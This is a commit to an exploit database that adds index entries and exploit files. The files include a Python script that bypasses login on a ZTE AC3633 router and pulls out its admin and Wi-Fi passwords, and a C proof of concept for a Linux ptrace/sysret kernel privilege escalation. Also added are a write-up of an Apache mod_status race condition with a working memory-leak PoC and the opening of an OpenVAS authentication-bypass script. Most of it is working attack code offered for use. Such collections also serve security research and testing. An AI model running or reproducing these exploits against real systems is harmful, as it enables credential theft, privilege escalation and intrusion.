From 2ea55e459e6bbf5d28ed678cf402c3c0b3a690cb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 23 Jul 2014 04:39:44 +0000 Subject: [PATCH] Updated 07_23_2014 --- files.csv | 15 +- platforms/hardware/webapps/34128.py | 81 ++++ platforms/lin_amd64/local/34134.c | 125 ++++++ platforms/linux/dos/34133.txt | 394 ++++++++++++++++++ platforms/linux/remote/34026.py | 75 ++++ platforms/linux/webapps/34130.rb | 572 ++++++++++++++++++++++++++ platforms/php/remote/34132.txt | 128 ++++++ platforms/php/webapps/34105.txt | 52 +++ platforms/php/webapps/34124.txt | 25 ++ platforms/win32/dos/34010.html | 113 +++++ platforms/windows/dos/34129.txt | 55 +++ platforms/windows/dos/34135.py | 122 ++++++ platforms/windows/local/34112.txt | 206 ++++++++++ platforms/windows/shellcode/33836.txt | 27 ++ 14 files changed, 1989 insertions(+), 1 deletion(-) create mode 100755 platforms/hardware/webapps/34128.py create mode 100755 platforms/lin_amd64/local/34134.c create mode 100755 platforms/linux/dos/34133.txt create mode 100755 platforms/linux/remote/34026.py create mode 100755 platforms/linux/webapps/34130.rb create mode 100755 platforms/php/remote/34132.txt create mode 100755 platforms/php/webapps/34105.txt create mode 100755 platforms/php/webapps/34124.txt create mode 100755 platforms/win32/dos/34010.html create mode 100755 platforms/windows/dos/34129.txt create mode 100755 platforms/windows/dos/34135.py create mode 100755 platforms/windows/local/34112.txt create mode 100755 platforms/windows/shellcode/33836.txt diff --git a/files.csv b/files.csv index 3f2759509..c3df5efb0 100755 --- a/files.csv +++ b/files.csv @@ -16855,7 +16855,7 @@ id,file,description,date,author,platform,type,port 19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0 -19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 +19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0 19528,platforms/windows/local/19528.txt,"MS IE 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 @@ -30481,6 +30481,7 @@ id,file,description,date,author,platform,type,port 33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 +33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 @@ -30631,6 +30632,7 @@ id,file,description,date,author,platform,type,port 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010 +34010,platforms/win32/dos/34010.html,"Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 'resin-admin/digest.php' Multiple Cross Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0 @@ -30644,6 +30646,7 @@ id,file,description,date,author,platform,type,port 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0 34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0 34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0 +34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0 @@ -30709,12 +30712,14 @@ id,file,description,date,author,platform,type,port 34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 +34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0 34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 +34112,platforms/windows/local/34112.txt,"Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0 34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0 @@ -30724,5 +30729,13 @@ id,file,description,date,author,platform,type,port 34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 'search.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0 +34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download (0day)",2014-07-20,pSyCh0_3D,php,webapps,0 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 'members.php' SQL Injection Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0 +34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 +34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 +34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80 +34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 +34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 +34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0 +34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 diff --git a/platforms/hardware/webapps/34128.py b/platforms/hardware/webapps/34128.py new file mode 100755 index 000000000..51a69e1f2 --- /dev/null +++ b/platforms/hardware/webapps/34128.py @@ -0,0 +1,81 @@ +#Author: Ajin Abraham - xboz +#http://opensecurity.in +#Product MTS MBlaze 3G Wi-Fi Modem +#System Version 107 +#Manufacturer ZTE +#Model AC3633 +import requests +import os +import urllib2 +print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit" +print "Vulnerabilities" +print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n" +url='http://192.168.1.1' +def find_between( s, first, last ): + try: + start = s.index( first ) + len( first ) + end = s.index( last, start ) + return s[start:end] + except ValueError: + return "" +#Vulnerable Static Cookies +cookies = dict(iusername='logined') +#Login Bypass +login_url = url+'/en/index.asp' +print "\nAttempting Login :"+url +print '=================' +try: + response=urllib2.urlopen(url,timeout=1) +except: + print "Cannot Reach : "+url + exit +r = requests.get(login_url, cookies=cookies) +print 'Status : ' + str(r.status_code) +if "3g.asp" in r.text: + print "Login Sucessfull!" +#Information Gathering +print "\nInformation" +print "=========" +info_url=url+'/en/3g.asp' +i= requests.get(info_url, cookies=cookies) +ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">') +subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">') +gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">') +print "IP : " +ip +print "Subnet : "+subnet +print "Gateway : " +gateway +#Steal Login Password +print "\nStealing Router Login Credentials" +print "======================" +login_pwd_url=url+'/en/password.asp' +p = requests.get(login_pwd_url, cookies=cookies) +print 'Status : ' + str(p.status_code) +print 'Username : admin' #default +passwd=find_between(p.text,'id="sys_password" value="','"/>') +print 'Password : '+ passwd +print '\nExtracting WPA/WPA2 PSK Key' +print '=================' +#Wi-Fi Password Extraction +wifi_pass_url=url+'/en/wifi_security.asp' +s = requests.get(wifi_pass_url, cookies=cookies) +print 'Status: ' + str(s.status_code) +wpa=find_between(s.text,"wpa_psk_key]').val('","');") +wep=find_between(s.text,"wep_key]').val('","');") +print "WPA/WPA2 PSK : " + wpa +print "WEP Key : " + wep + +print "\nOther Vulnerabilities" +print "=======================" +print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp" +print "\n2.Password Reset without old password and Session" +print """ +POST /goform/formSyWebCfg HTTP/1.1 +Host: 192.168.1.1 +Content-Type: application/x-www-form-urlencoded +Referer: http://192.168.1.1/en/password.asp +Accept-Encoding: gzip,deflate,sdch +Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4 +Content-Length: 52 + +action=Apply&sys_cfg=changed&sys_password=mblazetestpassword +""" diff --git a/platforms/lin_amd64/local/34134.c b/platforms/lin_amd64/local/34134.c new file mode 100755 index 000000000..539ba5723 --- /dev/null +++ b/platforms/lin_amd64/local/34134.c @@ -0,0 +1,125 @@ +/** + * CVE-2014-4699 ptrace/sysret PoC + * by Vitaly Nikolenko + * vnik@hashcrack.org + * + * > gcc -O2 poc_v0.c + * + * This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the + * following will trigger the #GP in sysret and overwrite the #PF handler so we + * can land to our NOP sled mapped at 0x80000000. + * However, once landed, the IDT will be trashed. We can either attempt to + * restore it (then escalate privileges and execute our shellcode) or find + * something else to overwrite that would transfer exec flow to our controlled + * user-space address. Since 3.10.something, IDT is read-only anyway. If you + * have any ideas, let me know. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SIZE 0x10000000 + +typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); + +unsigned long __user_cs; +unsigned long __user_ss; +unsigned long __user_rflags; + +void __attribute__((regparm(3))) payload() { + uint32_t *fixptr = (void*)0xffffffff81dd70e8; + // restore the #PF handler + *fixptr = -1; + //commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630; + //prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0; + //commit_creds(prepare_kernel_cred((uint64_t)NULL)); + + //__asm__ volatile ("swapgs\n\t" + // "..."); +} + +int main() { + struct user_regs_struct regs; + uint8_t *trampoline, *tmp; + int status; + + struct { + uint16_t limit; + uint64_t addr; + } __attribute__((packed)) idt; + + // MAP_POPULATE so we don't trigger extra #PF + trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0); + assert(trampoline == 0x80000000); + memset(trampoline, 0x90, SIZE); + tmp = trampoline; + tmp += SIZE-1024; + memcpy(tmp, &payload, 1024); + memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13); + + pid_t chld; + + if ((chld = fork()) < 0) { + perror("fork"); + exit(1); + } + + if (chld == 0) { + if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) { + perror("PTRACE_TRACEME"); + exit(1); + } + raise(SIGSTOP); + fork(); + return 0; + } + + asm volatile("sidt %0" : "=m" (idt)); + printf("IDT addr = 0x%lx\n", idt.addr); + + waitpid(chld, &status, 0); + + ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK); + + ptrace(PTRACE_CONT, chld, 0, 0); + + waitpid(chld, &status, 0); + + ptrace(PTRACE_GETREGS, chld, NULL, ®s); + regs.rdi = 0x0000000000000000; + regs.rip = 0x8fffffffffffffff; + regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78; + + // attempt to restore the IDT + regs.rdi = 0x0000000000000000; + regs.rsi = 0x81658e000010cbd0; + regs.rdx = 0x00000000ffffffff; + regs.rcx = 0x81658e000010cba0; + regs.rax = 0x00000000ffffffff; + regs.r8 = 0x81658e010010cb00; + regs.r9 = 0x00000000ffffffff; + regs.r10 = 0x81668e0000106b10; + regs.r11 = 0x00000000ffffffff; + regs.rbx = 0x81668e0000106ac0; + regs.rbp = 0x00000000ffffffff; + regs.r12 = 0x81668e0000106ac0; + regs.r13 = 0x00000000ffffffff; + regs.r14 = 0x81668e0200106a90; + regs.r15 = 0x00000000ffffffff; + + ptrace(PTRACE_SETREGS, chld, NULL, ®s); + + ptrace(PTRACE_CONT, chld, 0, 0); + + ptrace(PTRACE_DETACH, chld, 0, 0); +} diff --git a/platforms/linux/dos/34133.txt b/platforms/linux/dos/34133.txt new file mode 100755 index 000000000..a8f548b9a --- /dev/null +++ b/platforms/linux/dos/34133.txt @@ -0,0 +1,394 @@ +--[ 0. Sparse summary +Race condition between updating httpd's "scoreboard" and mod_status, +leading to several critical scenarios like heap buffer overflow with +user +supplied payload and leaking heap which can leak critical memory +containing +htaccess credentials, ssl certificates private keys and so on. +--[ 1. Prerequisites + +Apache httpd compiled with MPM event or MPM worker. +The tested version was 2.4.7 compiled with: + + ./configure --enable-mods-shared=reallyall --with-included-apr + +The tested mod_status configuration in httpd.conf was: + SetHandler server-status + ExtendedStatus On +--[ 2. Race Condition + +Function ap_escape_logitem in server/util.c looks as follows: + + 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char +*str) + 1909{ + 1910 char *ret; + 1911 unsigned char *d; + 1912 const unsigned char *s; + 1913 apr_size_t length, escapes = 0; + 1914 + 1915 if (!str) { + 1916 return NULL; + 1917 } + 1918 + 1919 /* Compute how many characters need to be escaped */ + 1920 s = (const unsigned char *)str; + 1921 for (; *s; ++s) { + 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) { + 1923 escapes++; + 1924 } + 1925 } + 1926 + 1927 /* Compute the length of the input string, including NULL +*/ + 1928 length = s - (const unsigned char *)str + 1; + 1929 + 1930 /* Fast path: nothing to escape */ + 1931 if (escapes == 0) { + 1932 return apr_pmemdup(p, str, length); + 1933 } + +In the for-loop between 1921 and 1925 lines function is computing the +length of +supplied str (almost like strlen, but additionally it counts special +characters +which need to be escaped). As comment in 1927 value says, function +computes count +of bytes to copy. If there's nothing to escape function uses +apr_pmemdup to duplicate +the str. In our single-threaded mind everything looks good, but tricky +part starts +when we introduce multi-threading. Apache in MPM mode runs workers as +threads, let's +consider the following scenario: + + 1) ap_escape_logitem(pool, "") is called + 2) for-loop in 1921 line immediately escapes, because *s is in +first loop run + 3) malicious thread change memory under *s to another value +(something which is not ) + 4) apr_pmemdup copies that change value to new string and returns +it + +Output from the ap_escape_logitem is considered to be a string, if +scenario above would occur, +then returned string would not be zeroed at the end, which may be +harmful. The mod_status +code looks as follows: + + 833 ap_rprintf(r, "%s%s" + 834 "%snn", + 835 ap_escape_html(r->pool, + 836 +ws_record->client), + 837 ap_escape_html(r->pool, + 838 +ws_record->vhost), + 839 ap_escape_html(r->pool, + 840 +ap_escape_logitem(r->pool, + 841 +ws_record->request))); + +The relevant call to ap_escape_html() is at line 839 after the +evaluation of ap_escape_logitem(). +The first argument passed to the ap_escape_logitem() is in fact an apr +pool associated with +the HTTP request and defined in the request_rec structure. + +This code is a part of a larger for-loop where code is iterating over +worker_score structs which is +defined as follows: + + 90struct worker_score { + 91#if APR_HAS_THREADS + 92 apr_os_thread_t tid; + 93#endif + 94 int thread_num; + 95 /* With some MPMs (e.g., worker), a worker_score can +represent + 96 * a thread in a terminating process which is no longer + 97 * represented by the corresponding process_score. These +MPMs + 98 * should set pid and generation fields in the worker_score. + 99 */ + 100 pid_t pid; + 101 ap_generation_t generation; + 102 unsigned char status; + 103 unsigned short conn_count; + 104 apr_off_t conn_bytes; + 105 unsigned long access_count; + 106 apr_off_t bytes_served; + 107 unsigned long my_access_count; + 108 apr_off_t my_bytes_served; + 109 apr_time_t start_time; + 110 apr_time_t stop_time; + 111 apr_time_t last_used; + 112#ifdef HAVE_TIMES + 113 struct tms times; + 114#endif + 115 char client[40]; /* Keep 'em small... but large +enough to hold an IPv6 address */ + 116 char request[64]; /* We just want an idea... */ + 117 char vhost[32]; /* What virtual host is being +accessed? */ + 118}; + +The 'request' field in a worker_score structure is particularly +interesting - this field can be changed inside +the copy_request function, which is called by the +update_child_status_internal. This change may occur when the +mod_status is iterating over the workers at the same time the +ap_escape_logitem is called within a different +thread, leading to a race condition. We can trigger this exact +scenario in order to return a string without a +trailing . This can be achived by running two clients, one triggering +the mod_status handler and second +sending random requests to the web server. Let's consider the +following example: + + 1) the mod_status iterates over workers invoking +update_child_status_internal() + 2) at some point for one worker mod_status calls +ap_escape_logitem(pool, ws_record->request) + 3) let's asume that ws_record->request at the beginning is "" +literally at the first byte. + 4) inside the ap_escape_logitem function the length of the +ws_record->request is computed, which is 1 + (an empty string consisting of ) + 5) another thread modifies ws_record->request (in fact it's called +ws->request in update_child_status_internal + function but it's exactly the same location in memory) and puts +there i.e. "GET / HTTP/1.0" + 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the +first one byte from "GET / HTTP/1.0" - "G" in + that case and returns it. The ap_pmemdup looks as follows: + + 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void +*m, apr_size_t n) + 113{ + 114 void *res; + 115 + 116 if (m == NULL) + 117 return NULL; + 118 res = apr_palloc(a, n); + 119 memcpy(res, m, n); + 120 return res; + + It allocates memory using apr_palloc function which returns +"ditry" memory (note that apr_pcalloc overwrite + allocated memory with NULs). + + So it's non-deterministic what's after the copied "G" byte. +There might be or might be not. For now let's + assume that the memory allocated by apr_palloc was dirty +(containing random bytes). + 7) ap_escape_logitem returns "G....." .junk. "" + +The value from the example above is then pushed to the ap_escape_html2 +function which is also declared in util.c: + + 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char +*s, int toasc) + 1861{ + 1862 int i, j; + 1863 char *x; + 1864 + 1865 /* first, count the number of extra characters */ + 1866 for (i = 0, j = 0; s[i] != ''; i++) + 1867 if (s[i] == '') + 1868 j += 3; + 1869 else if (s[i] == '&') + 1870 j += 4; + 1871 else if (s[i] == '"') + 1872 j += 5; + 1873 else if (toasc && !apr_isascii(s[i])) + 1874 j += 5; + 1875 + 1876 if (j == 0) + 1877 return apr_pstrmemdup(p, s, i); + 1878 + 1879 x = apr_palloc(p, i + j + 1); + 1880 for (i = 0, j = 0; s[i] != ''; i++, j++) + 1881 if (s[i] == '') { + 1886 memcpy(&x[j], ">", 4); + 1887 j += 3; + 1888 } + 1889 else if (s[i] == '&') { + 1890 memcpy(&x[j], "&", 5); + 1891 j += 4; + 1892 } + 1893 else if (s[i] == '"') { + 1894 memcpy(&x[j], """, 6); + 1895 j += 5; + 1896 } + 1897 else if (toasc && !apr_isascii(s[i])) { + 1898 char *esc = apr_psprintf(p, "&#%3.3d;", (unsigned +char)s[i]); + 1899 memcpy(&x[j], esc, 6); + 1900 j += 5; + 1901 } + 1902 else + 1903 x[j] = s[i]; + 1904 + 1905 x[j] = ''; + 1906 return x; + 1907} + +If the string from the example above would be passed to this function +we should get the following code-flow: + + 1) in the for-loop started in line 1866 we count the length of +escaped string + 2) because 's' string contains junk (due to only one byte being +allocated by the apr_palloc function), + it may contain '>' character. Let's assume that this is our +case + 3) after for-loop in 1866 line 'j' is greater than 0 (at least one +s[i] equals '>' as assumed above + 4) in the 1879 line memory for escaped 'd' string is allocated + 5) for-loop started in line 1880 copies string 's' to the escaped +'d' string BUT apr_palloc has allocated + only one byte for 's'. Thus, for each i > 0 the loop reads +random memory and copies that value + to 'd' string. At this point it's possible to trigger an +information leak vulnerability (see section 5). + +However the 's' string may overlap with 'd' i.e.: + + 's' is allocated under 0 with contents s = "AAAAAAAA>" + 'd' is allocated under 8 then s[8] = d[0]. + +If that would be the case, then for-loop would run forever (s[i] never +would be since it was overwritten in the loop +by non-zero). Forever... until it hits an unmapped memory or read only +area. + +Part of the scoreboard.c code which may overwrite the +ws_record->request was discovered using a tsan: + + #1 ap_escape_logitem ??:0 (exe+0x0000000411f2) + #2 status_handler +/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 +(mod_status.so+0x0000000044b0) + #3 ap_run_handler ??:0 (exe+0x000000084d98) + #4 ap_invoke_handler ??:0 (exe+0x00000008606e) + #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9) + #6 ap_process_http_async_connection http_core.c:0 +(exe+0x0000000b143e) + #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) + #8 ap_run_process_connection ??:0 (exe+0x00000009d156) + #9 process_socket event.c:0 (exe+0x0000000cc65e) + #10 worker_thread event.c:0 (exe+0x0000000d0945) + #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) + #12 :0 (libtsan.so.0+0x00000001b279) + + Previous write of size 1 at 0x7feff2b862b8 by thread T2: + #0 update_child_status_internal scoreboard.c:0 +(exe+0x00000004d4c6) + #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693) + #2 ap_process_http_async_connection http_core.c:0 +(exe+0x0000000b139a) + #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) + #4 ap_run_process_connection ??:0 (exe+0x00000009d156) + #5 process_socket event.c:0 (exe+0x0000000cc65e) + #6 worker_thread event.c:0 (exe+0x0000000d0945) + #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) + #8 :0 (libtsan.so.0+0x00000001b279) +--[ 3. Consequences + +Race condition described in section 2, may lead to: + + - information leak in case when the string returned by +ap_escape_logitem is not at the end, + junk after copied bytes may be valuable + - overwriting heap with a user supplied value which may imply code +execution +--[ 4. Exploitation + + In order to exploit the heap overflow bug it's necessary to get +control over: + + 1) triggering the race-condition bug + 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap + 3) part of 's' which doesn't overlap with 'd' (this string is copied +over and over again) + 4) overwriting the heap in order to get total control over the cpu or +at least modify the + apache's handler code flow for our benefits +--[ 5. Information Disclosure Proof of Concept + + -- cut + #! /usr/bin/env python + + import httplib + import sys + import threading + import subprocess + import random + + def send_request(method, url): + try: + c = httplib.HTTPConnection('127.0.0.1', 80) + c.request(method,url); + if "foo" in url: + print c.getresponse().read() + c.close() + except Exception, e: + print e + pass + + def mod_status_thread(): + while True: + send_request("GET", "/foo?notables") + + def requests(): + evil = ''.join('A' for i in range(random.randint(0, 1024))) + while True: + send_request(evil, evil) + + threading.Thread(target=mod_status_thread).start() + threading.Thread(target=requests).start() + + -- cut + +Below are the information leak samples gathered by running the poc +against the +testing Apache instance. Leaks include i.e. HTTP headers, htaccess +content, +httpd.conf content etc. On a live systems with a higher traffic +samples should +be way more interesting. + + $ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v notables + 127.0.0.1 {A} [] + 127.0.0.1 {A.01 cu0 cs0 + 127.0.0.1 {A27.0.0.1} [] + 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0 + 127.0.0.1 {A + Û [] + 127.0.0.1 {A HTTP/1.1} [] + 127.0.0.1 {Ab>
+ 127.0.0.1 {AAA} [127.0.1.1:19666]
+ 127.0.0.1 {A0.1.1:19666]
+ 127.0.0.1 {A§} [] + 127.0.0.1 {A cs0 + 127.0.0.1 {Adentity + 127.0.0.1 {A HTTP/1.1} [] + 127.0.0.1 {Ape: text/html; charset=ISO-8859-1 + 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} [] + 127.0.0.1 {Aÿÿÿÿÿÿÿ} [] + 127.0.0.1 {Aanilla/htdocs/foo} [] + 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} [] + 127.0.0.1 {A......................................... } [] + 127.0.0.1 {A-2014 16:23:30 CEST} [] + 127.0.0.1 {Acontent of htaccess + 127.0.0.1 {Aver: Apache/2.4.7 (Unix) + 127.0.0.1 {Aroxy:balancer://mycluster} [] +We hope you enjoyed it. + +Regards, +Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 + + diff --git a/platforms/linux/remote/34026.py b/platforms/linux/remote/34026.py new file mode 100755 index 000000000..94904315a --- /dev/null +++ b/platforms/linux/remote/34026.py @@ -0,0 +1,75 @@ +#!/usr/bin/python + +# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC +# Date: 09/07/2014 +# Exploit Author: EccE +# Vendor Homepage: http://www.openvas.org/ +# Software Link: http://wald.intevation.org/frs/?group_id=29 +# Version: OpenVAS Manager 4.0 +# Tested on: Debian GNU/Linux testing (jessie) +# CVE : CVE-2013-6765 + +""" + Small list of working commands + +get_agents +get_configs +get_alerts +get_filters +get_lsc_credentials +get_notes +get_nvts +get_targets +get_users +get_schedules + + +More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though. +As 